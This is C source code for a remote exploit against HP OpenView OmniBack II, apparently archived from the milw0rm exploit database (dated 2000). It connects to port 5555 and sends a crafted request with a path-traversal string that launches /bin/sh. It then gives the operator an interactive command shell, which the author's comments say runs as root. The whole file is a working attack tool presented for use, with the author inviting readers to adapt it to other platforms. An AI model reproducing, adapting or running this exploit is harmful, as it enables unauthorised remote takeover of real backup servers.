/* * HP OpenView OmniBack II generic remote Exploit by DiGiT - [email protected] * * Omniback is a network backup system by HP, widely used. * took me some time to figure out how omniback communicated then it was just * a matter of finding a bug. * * This lovely little exploit will give you a remote "shell" of sorts, you * can execute any command on the system. * * As far as I can tell this thing is vuln on every Omniback I have seen. * I've tried HP-UX, Linux so far, with diff versions etc. It needs some change * to work on windows, but should very extremly easy, be creative. * * Greets, #!security.is, #!ADM#$%$#, #hax & HP systems for this proggie ;> * * - DiGiT [[email protected]] * * I'm releasing this because it leaked and kids got their hands on it ;< * sorry. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <sys/time.h> #include <errno.h> #include <netdb.h> #include <unistd.h> #include <sys/stat.h> int sockfd; struct hostent *host; usage (char *progname) { printf ("\nOmniback II *: remote exploit by DiGiT - [email protected]\n"); printf ("Gives possibility to execute any command on a remote system as root!\n\n"); printf ("Usage: %s hostname \n\n", progname); exit (1); } int shell() { fd_set fd_stat; char recv[1024]; int n,i; static char testcmd[256] = "/bin/uname -a ; id ;\r\n"; fprintf(stdout, "We have remote shell&%#$&%!\n"); fprintf(stdout, "\nType in any command and it will get executed.\nHave fun... DiGiT - [email protected]\n\n\n"); write(sockfd, testcmd, strlen(testcmd)); while(1) { FD_ZERO(&fd_stat); FD_SET(sockfd, &fd_stat); FD_SET(0, &fd_stat); select(sockfd+1, &fd_stat, NULL, NULL, NULL); if (FD_ISSET(sockfd, &fd_stat)) { if((n=read (sockfd,recv,sizeof(recv))) < 0) { printf("Connection has been closed\n"); exit(0); } for(i = 0; i < n ; i++) { if(recv[i] == '\000') { recv[i] = ""; } } recv[n] = 0; recv[n-1] = '\n'; fprintf(stdout, "%s\n", recv); } if (FD_ISSET(0, &fd_stat)) { if((n=read(0, recv, sizeof(recv)))>0) { if(write(sockfd, recv,n) == -1) { printf("Error %$#\n"); exit(0); } } } } } send_code () { char path[32]; /* I dont care I just made test code and it worked, so #$%$# off */ write (sockfd, "\000\000\000.", 4); write(sockfd, "2", 1); write(sockfd, "\000", 1); write(sockfd, " a", 2); write(sockfd, "\000", 1); write(sockfd, " 0", 2); write(sockfd, "\000", 1); write(sockfd, " 0", 2); write(sockfd, "\000", 1); write(sockfd, " 0", 2); write(sockfd, "\000", 1); write(sockfd, " A", 2); write(sockfd, "\000", 1); write(sockfd, " 28", 3); write(sockfd, "\000", 1); snprintf(path, sizeof(path), "/../../../bin/sh"); write(sockfd, path, strlen(path)); write(sockfd, "\000", 1); write(sockfd, "\000", 1); write(sockfd, "digit ", 6); write(sockfd, "AAAA\n", 6); // nada.. shell(); // and the lord said, let there be shell. exit(0); } create_socket (char *hostname) { struct sockaddr_in s; int ipaddr; if ((host = gethostbyname (hostname)) == NULL) { herror ("gethostbyname"); exit (1); } memcpy (&ipaddr, host->h_addr, host->h_length); memset (&s, 0, sizeof (struct sockaddr_in)); s.sin_family = AF_INET; s.sin_port = htons (5555); s.sin_addr.s_addr = ipaddr; if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) < 0) { perror ("socket"); exit (1); } if ((connect (sockfd, (struct sockaddr *) &s, sizeof (s))) < 0) { perror ("connect"); exit (1); } } int main (char argc, char *argv[]) { char hostname[256]; if (argc < 2) { usage (argv[0]); return 0; } strncpy(hostname, argv[1], sizeof(hostname)); create_socket (hostname); send_code(); return 0; } // milw0rm.com [2000-12-21]